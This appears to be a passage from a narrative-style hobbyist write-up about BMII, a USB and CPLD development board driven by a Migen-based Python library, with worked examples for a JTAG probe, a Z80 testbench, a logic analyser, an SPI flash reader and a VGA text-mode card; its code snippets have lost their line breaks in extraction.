Imposing such kind of interface also meant imposing a huge, redundant and overblown part of HDL code only to ensure the glue logic between the core logic of the module and the rest of the design. This was where meta-programming became appropriate.
A python module called bmii had been developed to extend the structures provided by Migen. For instance, an extension of the ‘Module’ objects was included in this library to add all facilities needed to generate the intended glue logic.
from bmii import * iom = IOModule("pwm")
This object contained the
cregs
special attribute which was used to manage the control registers of theIOModule
.CtrlReg
was charged to construct a special 8-bit width Migen’sSignal
which embedded extra information needed to build the control registers network. The direction of such register had to be manually specified during instantiation. It could be:RDONLY
: Only readable from the host. The signal had to be driven by the internal logic of theIOModule
.WRONLY
: The signal could only be latched from the host, which could not read it back. This direction was useful to suggest that the toolchain synthesise this signal as a wire
instead of a verilog’sreg
.RDWR
: The signal could be read and written from the host. Synthesis of this kind of signal would likely result to verilog’sreg
.
For the PWM
IOModule
, only the pulse’sWIDTH
and theCOUNTER
signals had to be accessed from the host.iom.cregs += CtrlReg("WIDTH", CtrlRegDir.RDWR) iom.cregs += CtrlReg("COUNTER", CtrlRegDir.RDONLY)
In the same way,
iosignals
attribute handled the signals intended to be mapped to physical pins. AnIOSignal
always corresponded to a 1-bit width signal. The direction of an IOSignal
was also needed to be explicitly specified.OUT
: Signal driven by theIOModule
.IN
: Signal driven by an external component and read by theIOModule
’s logic.DIRCTL
: Signal driven by theIOModule
and used to control the tri-state buffer of a pin.
The PWM only used two outputs:
iom.iosignals += IOSignal("OUT", IOSignalDir.OUT) iom.iosignals += IOSignal("NOUT", IOSignalDir.OUT)
Finally, the internal logic could be described by using Migen’s special attributes:
iom.sync += iom.cregs.COUNTER.eq(iom.cregs.COUNTER + 1) iom.comb += iom.iosignals.OUT.eq(iom.cregs.COUNTER < iom.cregs.WIDTH) iom.comb += iom.iosignals.NOUT.eq(~iom.iosignals.OUT)
Section II: An Iron Hand In A Velvet Glove
The concept of control register was illustrated and justified. Their aim was then to think about how to make them accessible from the host by using USB.
Concretely, this step meant defining a unit that would be able to translate GPIF waveforms to a more convenient protocol to drive the internal bus. This unit had been called ‘Northbridge’.
The internal bus had been defined as follows:
MOSI[0:7]
andMISO[0:7]
represented the both directions of the data bus.WR
distinguished a read or a write operation.MADDR[0:2]
andRADDR[0:4]
were used to generate the chip select signal for a module and a control register respectively.REQ
informed the control register that an operation was going to be performed.
The issue here was related to the fact that the GPIF data bus had exactly the same width as a control register. This meant that the addressing and the read/write operations on the internal bus could not be achieved in a single clock tick.
From the GPIF point of view, performing an operation on the internal bus meant sending the module/control register address (latched by the Northbridge) before proceeding to the actual read/write operation.
The northbridge managed the GPIF’s control signals as follows:
CTL0
andCTL1
were basically forwarded to theREQ
andWR
signals of internal bus respectively.CTL2
was used to indicate that the USB controller was latching an address and that the current operation must not be considered as a regular write operation.
The northbridge was polling for operation by checking the value of the
CTL0
signal when clocking the interface clock. In addition to containing a value, control registers were generated with extra signals used to represent the operation currently performed on them, which facilitated their usage from the internal logic.
The
wr
andrd
signals indicated that the control register was selected and that a write or read operation respectively was going to be performed. These signals were asserted during several clock ticks as they were directly forwarded by the northbridge from the GPIF. So to facilitate the use of them in a synchronous circuit,wr_pulse
andrd_pulse
were derived from the previous signals. By using a ‘level to pulse’ state machine,wr_pulse
was implemented to be asserted during exactly one clock tick when the write operation was completed and then indicated to the internal logic that a valid value was available in the register. In the meantime, rd_pulse
pulsed the beginning of the read operation to inform theIOModule
that the control register was going to be read and then gave it time to feed a correct value before the next falling edge ofrd
signal, moment when its value was actually captured by the northbridge.At that point, any control register could be accessed from the host using the correct USB request. In order to make the usage of the USB easier from the host point of view, an additional interface had been introduced: the
BMIIModule
.A python object of this type contained two special attributes: the first one was the
IOModule
which represented the RTL design while the second was called the driver of theBMIIModule
. Automatically created, thedrv
attribute was able to inspect theIOModule
to generate the correct USB request according to the information specified in the RTL about the control registers addresses and directions.pwm = BMIIModule(iom)
To finalize the generation of the IO controller design, the
BMII
object acted as a top-level representation of the whole design of the board. It must be informed that a new module had to be added by using itsadd_module
method.A call to this procedure meant connecting the
IOModule
to the internal bus, allocating module and control registers addresses.b = BMII() b.add_module(pwm)
Once the CPLD was configured, the host could easily access the control registers by simply setting the attributes of the
drv
aliased with the control registers names:pwm.drv.WIDTH = 42 cnt = int(pwm.drv.COUNTER)
Section III: The Signal Goes South
In the same way the northbridge managed the communication with the external USB controller, another dedicated unit had been defined to handle the multiplexing of the
IOSignals
to physical IO pins. Obviously called thesouthbridge
, it was implemented as a specialIOModule
which had noIOSignals
and was only charged to manage the signals coming from other modules. For each physical pin, the southbridge was charged to generate the following circuit:Each pin was considered bidirectional and the direction could be configured with an
IOSignal
defined as such. An unlimited number of signals could read the value of a pin while only one could drive it.To inform the southbridge that an
IOSignal
had to be connected to a pin, assignment topins
attribute of this unit had to be performed as follow:b.ioctl.sb.pins.LED0 += pwm.iomodule.iosignals.OUT
The direction declared during the definition of the
IOSignal
were used to determine where the signal had to be connected on the pin multiplexing circuit.As the southbridge was considered as a regular
IOModule
, it was connected to the internal bus and then exposed its own control registers. This opportunity was leveraged to make the pins controllable from host bypassing the need of defining a specificIOModule
when a simple operation had to be performed on the IOs.PINDIR
,PINDIRMUX
,PINOUT
,PINMUX
andPINSCAN
signals of each pin were accessible using southbridge’s control registers. For instance, making the LED blink could be commanded by:b.modules.southbridge.drv.PINMUXMISC.LED1 = 1 # Make the southbridge drive the LED1 pin b.modules.southbridge.drv.PINOUTMISC.LED1 = \ int(b.modules.southbridge.drv.PINSCANMISC.LED1) ^ 1 # Toggle the LED1 pin
For the example design previously defined, a complete mapping of the internal bus’s address space looked as follow:
b.list_modules() -- 0x0: northbridge 0x0: IDCODE (CtrlRegDir.RDONLY) 0x1: SCRATCH (CtrlRegDir.RDWR) 0x1: southbridge 0x0: PINDIR1L (CtrlRegDir.RDWR) 0x1: PINDIR1H (CtrlRegDir.RDWR) 0x2: PINDIR2L (CtrlRegDir.RDWR) 0x3: PINDIR2H (CtrlRegDir.RDWR) 0x4: PINSCAN1L (CtrlRegDir.RDONLY) 0x5: PINSCAN1H (CtrlRegDir.RDONLY) 0x6: PINSCAN2L (CtrlRegDir.RDONLY) 0x7: PINSCAN2H (CtrlRegDir.RDONLY) 0x8: PINSCANMISC (CtrlRegDir.RDONLY) 0x9: PINMUX1L (CtrlRegDir.RDWR) 0xa: PINMUX1H (CtrlRegDir.RDWR) 0xb: PINMUX2L (CtrlRegDir.RDWR) 0xc: PINMUX2H (CtrlRegDir.RDWR) 0xd: PINDIRMUX1L (CtrlRegDir.RDWR) 0xe: PINDIRMUX1H (CtrlRegDir.RDWR) 0xf: PINDIRMUX2L (CtrlRegDir.RDWR) 0x10: PINDIRMUX2H (CtrlRegDir.RDWR) 0x11: PINMUXMISC (CtrlRegDir.RDWR) 0x12: PINOUT1L (CtrlRegDir.RDWR) 0x13: PINOUT1H (CtrlRegDir.RDWR) 0x14: PINOUT2L (CtrlRegDir.RDWR) 0x15: PINOUT2H (CtrlRegDir.RDWR) 0x16: PINOUTMISC (CtrlRegDir.RDWR) 0x2: PWM 0x0: WIDTH (CtrlRegDir.RDWR) 0x1: COUNTER (CtrlRegDir.RDONLY)
The northbridge used two control registers defined for testing purposes only. The
IDCODE
contained a magic number read by the USB controller to verify the validity of the CPLD’s configuration while theSCRATCH
register was used to test write operations on the bus.To sum up, the following architecture had been defined as the basis for further improvements:
Section IV: An Autarchical Sequence
As this architecture was mainly based on the flexibility provided by the CPLD, one issue still remained before becoming truly usable: the compiling and programming sequences of a BMII’s design had to stay self-contained and to avoid the need of external hardware tools.
The building sequence aimed to produce the binary blob of the USB firmware as well as the bitstream of the IO controller. For the FX2LP, a ninja build file was generated to proceed to the compiling of the custom firmware using sdcc.
Concerning the IO controller, the verilog generation was left to Migen while the building of the bitstream was ensured by Quartus.
b.build_all()
The programming sequence was a bit more tricky. A first and trivial way to achieve this was to use a USB Blaster JTAG probe to configure the CPLD with the desired bitstream. In order to be self-programmed, the CPLD’s JTAG signals had been connected to a tri-state buffer in addition to the regular 10-pin JTAG header. Ensured by a standard 74244, this buffer was driven by the USB controller. The goal of this circuit was to give the ability to communicate with the CPLD via JTAG when the
JTAGE
was asserted.To be able to reuse Quartus Programmer software to program the CPLD, the open-source implementation of the USB Blaster protocol for FX2LP (ixo.de USB JTAG) had been adapted to match the wiring of their circuit.
b.program_all()
The programming sequence could be summarized as follows:
- The first step was to load the custom USB Blaster firmware into the USB controller using fxload.
- If a JTAG IDCODE scan was successful, the bitstream was uploaded using Quartus Programmer.
- To be able to write their own FX2LP firmware to the EEPROM, a second stage firmware loader was programmed in the chip. It added a new USB vendor command allowing writing operations on the I2C bus.
- Finally, the regular firmware was loaded in the USB controller.
Chapter III: The Fellowship Of The Joint Test
As a first application of their board, the second tinkerer proposed to implement a full-featured JTAG probe that anyone could use as an alternative to Flyswatter, Bus Blaster or any other cheap JTAG probe.
The JTAG defines an electrical standard for on-chip instrumentation by using a dedicated debug port implementing a serial communication interface. This protocol was well-defined and simple enough to be used as a comprehensive example.
The third one replied that demonstrating the usefulness of their project by trying to mimic other well-known and mature JTAG probes was a waste of time since reaching comparable performance would require more effort than he could imagine at the time.
The first tinkerer mitigated that argument by pointing the fact that no cheap JTAG probe was generic enough to be compatible with a very wide range of platforms and very few of them were designed to be used in contexts other than just CPU’s on-chip debugging. He agreed and started to think about a possible implementation of such protocol using their project.
Section I: The Bridge Of Shockley
Even though the JTAG standard was quite strict about the communication logic, the electrical characteristics of the signals were left to the target device. This meant that the probe had the responsibility to drive them with the target voltage.
Assuming that the main board was only able to drive 3.3V IOs, expanding it with the needed interface was required.
A first version had been implemented using voltage level shifters and worked well with some mainstream devices. However, some platforms from specific manufacturers pull-up JTAG signals with very low resistors, which forced the probe to drive more current than most of the voltage level shifters could supply.
As a quick fix, the expansion board had been equipped with bipolar junction transistors for output signals.
In a more generic way, they thought that being forced to design an expansion board to electrically convert signals from the main board to the driven target was not a big deal. The main board’s IOs could simply not be electrically universal.
Section II: The Self-Surgery
For a naive implementation of JTAG protocol, the
IOModule
consisted of simply connecting theTMS
andTDI
outputs to a write-only control register while wiring theTCK
to itswr_pulse
signal. In this configuration, each JTAG clock tick was triggered by writing to this control register. Each device on a JTAG daisy chain communicated via a Test Access Port. This hardware unit implemented a stateful protocol to expose its debug facilities. As it was possible to make all of them converge to a reset and stable state, it was easy to walk through this state machine by keeping all TAPs synchronized.
Assuming this, a unique state machine was implemented in the
IOModule
to keep the track of the current TAP state. A control register had been allocated to allow the host to check this state when needed.Devices responded to JTAG scans with the
TDO
signal. The FIFO block was used to buffer received data before being read by the host through a read-only register. This case perfectly demonstrated the usage of the rd_pulse
signal since it was used to dequeue the next value of the FIFO submodule.Although most platforms’s JTAG daisy chain were short and fixed, some of them could dynamically append TAP to the chain, making the usage of general purpose JTAG tools unusable. To describe this kind of situation, facilities had been implemented to describe a dynamic TAP network.
from bmii.modules.jtag import JTAG, TAP, DR
A
JTAG
object extended a regularBMIIModule
to abstract the low-level operations to the JTAG’sIOModule
.TAP
andDR
were provided to describe the current layout of the TAP network. For instance, describing the Max V’s JTAG would look like this:class AlteraMaxVJTAG(JTAG): def __init__(self): JTAG.__init__(self) tap = TAP("CPLDTAP", 10) # 10-bit instruction register # name instr. reg. length tap += DR("SAMPLE/PRELOAD", 0b0000000101, 480) tap += DR("EXTEST", 0b0000001111, 480) tap += DR("BYPASS", 0b1111111111, 1) tap += DR("USERCODE", 0b0000000111, 32) tap += DR("IDCODE", 0b0000000110, 32) tap += DR("HIGHZ", 0b0000001011, 1) tap += DR("CLAMP", 0b0000001010, 32) tap += DR("USER0", 0b0000001100, 32) tap += DR("USER1", 0b0000001110, 32) self.add_tap(tap) @classmethod def default(cls, bmii): jtag = cls() bmii.add_module(jtag) bmii.ioctl.sb.pins.IO10 += jtag.iomodule.iosignals.TMS bmii.ioctl.sb.pins.IO11 += jtag.iomodule.iosignals.TCK bmii.ioctl.sb.pins.IO12 += jtag.iomodule.iosignals.TRST bmii.ioctl.sb.pins.IO13 += jtag.iomodule.iosignals.TDI bmii.ioctl.sb.pins.IO21 += jtag.iomodule.iosignals.TDO return jtag
According to that description, scanning the
IDCODE
of the device could be simply done by:b = BMII() jtag = AlteraMaxVJTAG.default(b) jtag.reset() jtag.irdrscan("CPLDTAP", "IDCODE")
A possible improvement for this would be to generate this tap network directly from the BSDL files of daisy chained devices. The usage of BJT to drive JTAG signals was also a very quick and easy response to the low pull-up resistance problem. The third tinkerer complained that many other solutions could be implemented there as the BJT had a very long switching time and then forced to drive signals at 12MHz when many targets supported to be clocked up to 100MHz in their debug port.
Chapter IV: And In Darkness Bind Them
Sceptical about the results of the first application, the third tinkerer thought about a niche application that only few people would actually need. Enthusiastic but upset by the pragmatism of the two others, he left the group to develop his idea on his own.
For him, a second purpose for this board was purely and simply to act as a test bench for analysing black-boxed devices. To demonstrate his idea, he chose the first device he could find in his drawer: a Z80 packaged in a DIP-40.
Primarily sold by Zilog as an improved Intel 8080, it had become a very popular processor for simple embedded applications since it was truly easy to make this chip work with a custom circuit. This device was then the perfect guinea pig for his experiments.
Section I: The Calm Before The Storm
Before trying to blow up the chip, defining the RTL needed to correctly drive the CPU was necessary.
iom = IOModule("Z80TB")
The DIP-40 version of this CPU exposed a 16-bit address bus and a 8-bit data bus. As the last one was bidirectional, three different
IOSignals
had to be defined:DIN
,DOUT
andDDIR
. In order to keep the main board and the device under test synchronized, the CPU’s clock was managed by theIOModule
. All other required control signals were defined asIOSignals
.ADDRESS_WIDTH = 14 # Truncated, actually 16. DATA_WIDTH = 8 iom.iosignals += IOSignal("CLK", IOSignalDir.OUT) iom.iosignals += IOSignal("_M1", IOSignalDir.IN) iom.iosignals += IOSignal("_MREQ", IOSignalDir.IN) iom.iosignals += IOSignal("_IOREQ", IOSignalDir.IN) iom.iosignals += IOSignal("_RD", IOSignalDir.IN) iom.iosignals += IOSignal("_WR", IOSignalDir.IN) iom.iosignals += IOSignal("_WAIT", IOSignalDir.OUT) iom.iosignals += IOSignal("_HALT", IOSignalDir.IN) iom.iosignals += IOSignal("_RESET", IOSignalDir.OUT) iom.iosignals += IOSignal("_RFSH", IOSignalDir.IN) for i in range(ADDRESS_WIDTH): iom.iosignals += IOSignal("A{}".format(i), IOSignalDir.IN) oe = Signal() for i in range(DATA_WIDTH): iom.iosignals += IOSignal("DIN{}".format(i), IOSignalDir.IN) iom.iosignals += IOSignal("DOUT{}".format(i), IOSignalDir.OUT) iom.iosignals += IOSignal("DDIR{}".format(i), IOSignalDir.DIRCTL) iom.comb += getattr(iom.iosignals,"DDIR{}".format(i)).eq(oe)
From the host point of view, the only reasonable access points were the information about the state of the CPU, the address it was accessing and the data it transferred.
iom.cregs += CtrlReg("STATE", CtrlRegDir.RDONLY) iom.cregs += CtrlReg("DIN", CtrlRegDir.RDONLY) for i in range(DATA_WIDTH): iom.comb += iom.cregs.DIN[i].eq(getattr(iom.iosignals, "DIN{}".format(i))) iom.cregs += CtrlReg("DOUT", CtrlRegDir.WRONLY) for i in range(DATA_WIDTH): iom.comb += getattr(iom.iosignals, "DOUT{}".format(i)).eq(iom.cregs.DOUT[i]) iom.cregs += CtrlReg("ADDRL", CtrlRegDir.RDONLY) iom.cregs += CtrlReg("ADDRH", CtrlRegDir.RDONLY) for i in range(ADDRESS_WIDTH): if i < 8: addr = iom.cregs.ADDRL else: addr = iom.cregs.ADDRH iom.comb += addr[i % 8].eq(getattr(iom.iosignals, "A{}".format(i)))
A special control register had been added to perform special control operations on the CPU. It was mainly used to manually control the
RESET
signal forcing the reset of the chip from any CPU state.iom.cregs += CtrlReg("CTL", CtrlRegDir.RDWR) iom.cregs.CTL[0] = "RESET" iom.comb += iom.iosignals._RESET.eq(~iom.cregs.CTL.RESET)
The clock signal of the Z80 had been fixed to half the frequency of the system clock. Due to clocking requirement of the chip, this signal was fixed to 8MHz.
iom.sync += iom.iosignals.CLK.eq(~iom.iosignals.CLK)
Requests from the Z80 CPU followed 3 stages. When it was not halted, the testbench entered an
IDLE
state. During this one, the CPU was still performing operations internally but did not request any external resources.The second stage followed a request detection. The goal here was to freeze the CPU execution until the host provided an instruction to the testbench about how to handle the request.
Finally, the last stage meant actually responding to CPU’s request according to host instructions.
from enum import IntEnum class Z80State(IntEnum): UNKNOWN = 0b00000000 IDLE = 0b00000001 FETCH = 0b00000010 MEMRD = 0b00000100 MEMWR = 0b00001000 IORD = 0b00010000 IOWR = 0b00100000 HALTED = 0b01000000
To implement this state machine in the RTL, Migen provided facilities to define FSMs in its generic library:
from migen.genlib fsm = FSM() iom.submodules += fsm
According to Z80 waveforms, the request for bus access was asserted using
_MREQ
or_IOREQ
. During the request initiation,_RD
,_WR
and the address bus were driven and valid. When leaving the
IDLE
state, the testbench could determine what kind of request was going to be performed and could notify the host about that.fsm.act("IDLE", iom.cregs.STATE.eq(Z80State.IDLE), If(~iom.iosignals._HALT, NextState("HALTED")).\ Else( If(~iom.iosignals._MREQ & iom.iosignals._RFSH, If(~iom.iosignals._RD, If(~iom.iosignals._M1, NextState("FETCH")).\ Else(NextState("MEMRD"))).\ Elif(~iom.iosignals._WR, NextState("MEMWR"))).\ Elif(~iom.iosignals._IOREQ, If(~iom.iosignals._WR, NextState("IOWR")).\ Elif(~iom.iosignals._RD, NextState("IORD"))))) fsm.act("HALTED", iom.cregs.STATE.eq(Z80State.HALTED), If(iom.iosignals._HALT, NextState("IDLE")))
While waiting for an answer from the host, the trick here was to assert the
_WAIT
input of the CPU in order to notify it that bus cycle could not be completed at that moment. This left enough time for the host to communicate its desired operation. To finalize a write operation, the host just had to read from theWRITE
register. Completing a read operation was performed by writing to the READ
control register.bus_access = Signal() iom.comb += iom.iosignals._WAIT.eq(~bus_access) def goto_rd(): return If(iom.cregs.DOUT.wr_pulse, NextState("READ")) def goto_wr(): return If(iom.cregs.DIN.rd_pulse, NextState("WRITE")) fsm.act("FETCH", iom.cregs.STATE.eq(Z80State.FETCH), bus_access.eq(1), goto_rd()) fsm.act("MEMRD", iom.cregs.STATE.eq(Z80State.MEMRD), bus_access.eq(1), goto_rd()) fsm.act("MEMWR", iom.cregs.STATE.eq(Z80State.MEMWR), bus_access.eq(1), goto_wr()) fsm.act("IORD", iom.cregs.STATE.eq(Z80State.IORD), bus_access.eq(1), goto_rd()) fsm.act("IOWR", iom.cregs.STATE.eq(Z80State.IOWR), bus_access.eq(1), goto_wr())
To finally complete the bus cycle after intervention from the host, the data bus just had to be driven in the corresponding direction:
def goto_idle(): return If(iom.iosignals._MREQ & iom.iosignals._IOREQ, NextState("IDLE")) fsm.act("READ", iom.cregs.STATE.eq(Z80State.IDLE), oe.eq(1), goto_idle()) fsm.act("WRITE", iom.cregs.STATE.eq(Z80State.IDLE), goto_idle())
Section II: The Gates Open
Once the testbench logic defined, the
BMIIModule
could then be integrated to a finalBMII
design:z80tb = BMIIModule(iom) b = BMII() b.add_module(z80tb)
The actual wiring to the tested Z80 looked as follows. Due to the lack of physical IO pins on the main board, the two last pins of the address bus had been ignored.
The southbridge had to be informed of this configuration. Any changes on the physical circuit only implied rerouting of the testbench’s
IOModule
on the southbridge unit:b.ioctl.sb.pins.IO28 += iom.iosignals._RESET b.ioctl.sb.pins.IO29 += iom.iosignals._WAIT b.ioctl.sb.pins.IO2A += iom.iosignals.CLK b.ioctl.sb.pins.IO2B += iom.iosignals._M1 b.ioctl.sb.pins.IO2C += iom.iosignals._MREQ b.ioctl.sb.pins.IO2D += iom.iosignals._IOREQ b.ioctl.sb.pins.IO2E += iom.iosignals._RD b.ioctl.sb.pins.IO2F += iom.iosignals._WR b.ioctl.sb.pins.IO1F += iom.iosignals._HALT b.ioctl.sb.pins.IO1E += iom.iosignals._RFSH for i in range(ADDRESS_WIDTH): pin = getattr(b.ioctl.sb.pins, "IO1{}".format(hex(i)[2:].upper())) pin += getattr(iom.iosignals, "A{}".format(i)) for i in range(DATA_WIDTH): pin = getattr(b.ioctl.sb.pins, "IO2{}".format(i)) pin += getattr(iom.iosignals, "DIN{}".format(i)) pin += getattr(iom.iosignals, "DOUT{}".format(i)) pin += getattr(iom.iosignals, "DDIR{}".format(i))
Section III: La Grande Illusion
As the IO controller design was completed, the host driver had to be completed in order to define the exact behaviour of the testbench.
For this example, the goal was to be able to execute a very short piece of code on the connected Z80. The content of the main memory had been defined as:
def ld_hl_nn(nn): return [0x2A, nn & 0xFF, (nn >> 8) & 0xFF] def ld_b_n(n): return [0x06, n] def ld_c_n(n): return [0x0E, n] def otir(): return [0xED, 0xB3] def halt(): return [0x76] from itertools import chain, islice, repeat s = "LSE" instrs = chain( # Instructions ld_hl_nn(0x000A), # 0000 - Load string address ld_b_n(len(s)), # 0003 - Load string length ld_c_n(0), # 0005 - Set IO port address otir(), # 0007 - Output the string halt(), # 0009 - Halt the CPU # Data [0x0C, 0x00], # 000A - String address [ord(c) for c in s], # 000C - String content # Padding repeat(halt()) # Fill the rest of the memory # with HALT instruction ) mem = list(islice(instrs, 256))
The only job of the host was to poll the
STATE
register and to reply by reading from theDIN
control register or by writing toDOUT
according to the CPU’s request.recvbuff = "" # Reset the CPU by pulsing the _RESET signal z80tb.drv.CTL.RESET = 1 z80tb.drv.CTL.RESET = 0 while True: state = int(z80tb.drv.STATE) print("{} \t-- Addr: {:04x}".format(str(Z80State(state)), (int(z80tb.drv.ADDRH) << 8) | int(z80tb.drv.ADDRL)), end='') # Emulate main memory reading if (state in [Z80State.FETCH, Z80State.MEMRD]): z80tb.drv.DOUT = mem[int(z80tb.drv.ADDRL)] # Emulate main memory writing elif (state == Z80State.MEMWR): mem[int(z80tb.drv.ADDRL)] = int(z80tb.drv.DIN) # Emulate reading from device elif (state == Z80State.IORD): z80tb.drv.DOUT = 0xFF # Emulate writing to device elif (state == Z80State.IOWR): data = int(z80tb.drv.DIN) recvbuff += chr(data) print(" | Data: {:02x} ({})".format(data, chr(data)), end='') # Stop main loop when CPU reaches the halt state elif (state == Z80State.HALTED): break print() print("Received string: [{}]".format(recvbuff)) -- Z80State.FETCH -- Addr: 0000 Z80State.MEMRD -- Addr: 0001 Z80State.MEMRD -- Addr: 0002 Z80State.MEMRD -- Addr: 000a Z80State.MEMRD -- Addr: 000b Z80State.FETCH -- Addr: 0003 Z80State.MEMRD -- Addr: 0004 Z80State.FETCH -- Addr: 0005 Z80State.MEMRD -- Addr: 0006 Z80State.FETCH -- Addr: 0007 Z80State.FETCH -- Addr: 0008 Z80State.MEMRD -- Addr: 000c Z80State.IOWR -- Addr: 0200 | Data: 4c (L) Z80State.FETCH -- Addr: 0007 Z80State.FETCH -- Addr: 0008 Z80State.MEMRD -- Addr: 000d Z80State.IOWR -- Addr: 0100 | Data: 53 (S) Z80State.FETCH -- Addr: 0007 Z80State.FETCH -- Addr: 0008 Z80State.MEMRD -- Addr: 000e Z80State.IOWR -- Addr: 0000 | Data: 45 (E) Z80State.FETCH -- Addr: 0009 Z80State.HALTED -- Addr: 001f Received string: [LSE]
Chapter V: The Feebleness Appears
In the meantime, the two other tinkerers were focussed on testing the main board on some more pragmatic scenarios in order to check its limitations with the hope to serve a real purpose.
Section I: The Relativity of Space…
Their experience with the implementation of a JTAG module was marked by the difficulty to debug and trace the state of the digital design. As the northbridge and the internal bus logic were considered reliable enough, they decided to implement an
IOModule
exclusively designed to probe any other signals of the IO controller design. Acting as an internal logic analyser, a probing circuit composed of one control register fed by a FIFO was generated for each probed signal.
The capture was triggered by a special configurable signal and could be reset by the host at any moment.
As an example, the following design made the main board to act as a very cheap logic analyzer where all IO signals were simultaneously probed. The trigger was wired to the physical switch input:
b = BMII() la = LogicAnalyzer(4) # Probing FIFO of 4 elements b.add_module(la) sb = b.modules.southbridge.iomodule # Probe name Width Signal la.probe("IO1L", 8, sb.cregs.PINSCAN1L) la.probe("IO1H", 8, sb.cregs.PINSCAN1H) la.probe("IO2L", 8, sb.cregs.PINSCAN2L) la.probe("IO2H", 8, sb.cregs.PINSCAN2H) la.probe("IOMISC", 8, sb.cregs.PINSCANMISC) la.set_trigger(~sb.cregs.PINSCANMISC.SW)
In parallel of that, an implementation of a master SPI module was in development. It was a perfect test case for the logic analyzer as it was not yet tested on a real SPI slave.
from bmii.modules.spi import SPIMaster from bmii.modules.spidev import SerialFlash b = BMII.default() spi = SPIMaster.default(b) la.probe("SCLK", 1, spi.iomodule.iosignals.SCLK) la.probe("SS0", 1, spi.iomodule.iosignals.SS0) la.probe("MOSI", 1, spi.iomodule.iosignals.MOSI) la.set_trigger(spi.iomodule.cregs.TX.wr_pulse)
The SPI module initiated a transaction when its
TX
register was written. Its wr_pulse
was then used to define the trigger of the logic analyzer, as the goal was to analyse the output signals during SPI activity. The
capture
method of a logic analyzer object waited for a capture to be completed and then dequeued the samples by reading the control register of each probe. la.reset() spi.select_slave(0) spi.tranceive(42) la.capture() la.show()
Finally, the
show
method could be used to write the captured waveforms to a VCD file and to display them using gtkwave: However, each probe circuit was significantly logic-block-consuming, which limited the design to tiny FIFOs, making the logic analyser useless on complex circuits.
Section II: …And Time
After this first disappointment related to the quite limited space provided by the CPLD, they pursued their work on the SPI module by implementing the operations required to drive a JEDEC-compliant serial flash memory.
sf = SerialFlash.default(b, spi, slave_id=0) sf.read_id() -- Manufacturer ID: 0xC2 (Macronix) Memory Type: 0x20 Memory Capacity: 0x15 (16Mb)
Driving the SPI flash was actually quite easy once it had been extracted from its original circuit. This one was desoldered from a PC motherboard:
sf.dump(0x1FE000, size=25) b'Award BootBlock BIOS v1.0'
The real challenge would be to probe the SPI packets in a passive way. This implied basing the
IOModule
logic on the SPI clock imposed by an external device instead of the regular system clock. Even though all this logic had been implemented and tested on simple devices, it was still returning malformed data when used on a PC motherboard, since the BIOS flash was clocked at a frequency higher than 40MHz. Their guess as to the cause of this issue was based on the fact that no IO pins were connected to a clock input of the CPLD. This meant that the SPI clock was gated by a regular IO input not designed to support such a high frequency.
Chapter VI: Displayed As Of Yore
Affected by these previous failures, the first two tinkerers had doubts about the real efficiency of the current hardware design of their board. Out of curiosity, and driven by their discouragement, they looked for the third one, probably lost in his solo projects.
They found him in his basement, soldering wires and axial resistors to a VGA connector. He explained that he was, oddly, trying to make the main board act as a video card. That was a plainly useless job but he was glad to do it. Bored, the two others tried to help him finish and agreed that it would be their last experiment with their board.
Section I: The Dilemma Of Etching Copper
Although driving VGA signals was something quite simple, they estimated that creating a dedicated expansion board would make their job easier. Firstly, it would allow the mechanical integration of a decent VGA connector. Secondly, it was a good opportunity to add some extra memory to the board, as the CPLD would not be able to store enough data to implement a video card. A standard 128KB static RAM in an SSOP package had been chosen due to its simple interface and its fast response time.
The VGA’s RGB pins must be driven by analog signals which implied the use of Digital to Analog Converters to be controlled from the CPLD. As these signals were defined to be ground terminated by a 75 Ohm resistor on the monitor side, a cheap equivalent of a DAC could be obtained by connecting different resistors to several CPLD’s outputs, connected in parallel and acting as a voltage divider with monitor’s termination resistor (see
R1
to R6
). By allocating 6 outputs for driving RGB signals, 64 colors could be generated. However, the limited number of IO pins prevented the use of all 17 pins of the SRAM’s address bus at the same time as the 6 pins of the RGB signals.
In order to postpone this design decision, jumpers had been added to the extension PCB to allow the configuration at soldering-time. The first setting allowed the usage of 8 colors with a 256KB video RAM while the second one constrained the use of a 16KB RAM but could drive 64 colors (see table at the bottom layer of the PCB).
Section II: A Proselytized Static Memory
On a regular video card, the framebuffer was supposed to be stored in a dual-port RAM in order to allow the controller to write the displayed frame at the same time as it was read by the signal generator. As this kind of device must be controlled by a large number of pins, a regular SRAM had been used as a substitute for a real VRAM.
Of course, this tweak forced a tighter management of the VRAM, as two independent actors were using it at the same time while it provided a single interface.
From a high-level point of view the simple video card could be represented as an
IOModule
by following this architecture: To manage the VRAM, the trick was to exploit the fact that the pixel clock required to display at a resolution of 640x480 at 60Hz was fixed to 25.175 MHz. As the IO controller was clocked at 48MHz, odd ticks were used to read from the VRAM and to drive the pixel clock at 24MHz, which was acceptable for most recent VGA monitors. Meanwhile, even ticks were used to perform the write operations on the VRAM. To ensure that write operations were successful, the read operation that followed a write was cancelled, which was not critical most of the time but could lead to small display glitches.
The VRAM management unit could be described with the following state-machine:
- 1: If a write operation has to be performed, then, drive the data and the address bus. Else, drive the address bus for the next reading.
- 2: Reading state: Capture the output of the VRAM
- 3: Writing state: Indicate to the VRAM that the data bus is ready to be read for a memory writing.
Section III: Words Engraved In A Black Screen
As the VRAM management core logic and the VGA signal generation were working correctly, only the logic needed to drive the reads from the VRAM and to drive the RGB signals according to the VRAM’s data had to be adapted to modify the display.
To demonstrate how the VRAM could be managed, a simple text mode had been implemented.
The VRAM had been organized as follows:
0x0000
- Text framebuffer: as in the VGA-compatible text mode implemented on PC platforms, each character consisted of one byte for the ASCII code and a second one containing the color. 0x0700
- Character set (3KB): Sprites representing each character. A font similar to the IBM’s code page 437 was used.
As only one read from the VRAM was possible per pixel clock tick, the reading sequence had to be aligned to the character display. During the last three pixels of a character, the VRAM reading logic fetched the ASCII code and the color of the next character from the framebuffer and provided the corresponding sprite’s row from the character set to the display logic.
Epilogue
Surprisingly, the first two tinkerers found unexpected satisfaction in completing this dumb video card. The result of this last experiment reflected the childish feelings that had pushed them to start their first board: a satisfying design serving a useless objective.
This forced step-back helped them to highlight the items that could improve the next version of the board, if someone were brave enough to follow in their footsteps. The lack of logic blocks could be easily solved by switching to an FPGA. A lot of decent ones were still available in 144-pin EQFP packages. Allocating pins to an external RAM would also not be a waste. Many other applications were blocked by the lack of an embedded and easy-to-use memory.
Concerning the timing issues encountered while probing the SPI flash, simply mapping some clock inputs to physical headers would be enough to unscramble most of them.
After that, the tinkerers team split up. Each of them had been aligned to the ‘state-of-art’-ish folk and they finally scattered, where engineers dwell…
References
Sources
Datasheets
-
LSE Week 2016: Schedule
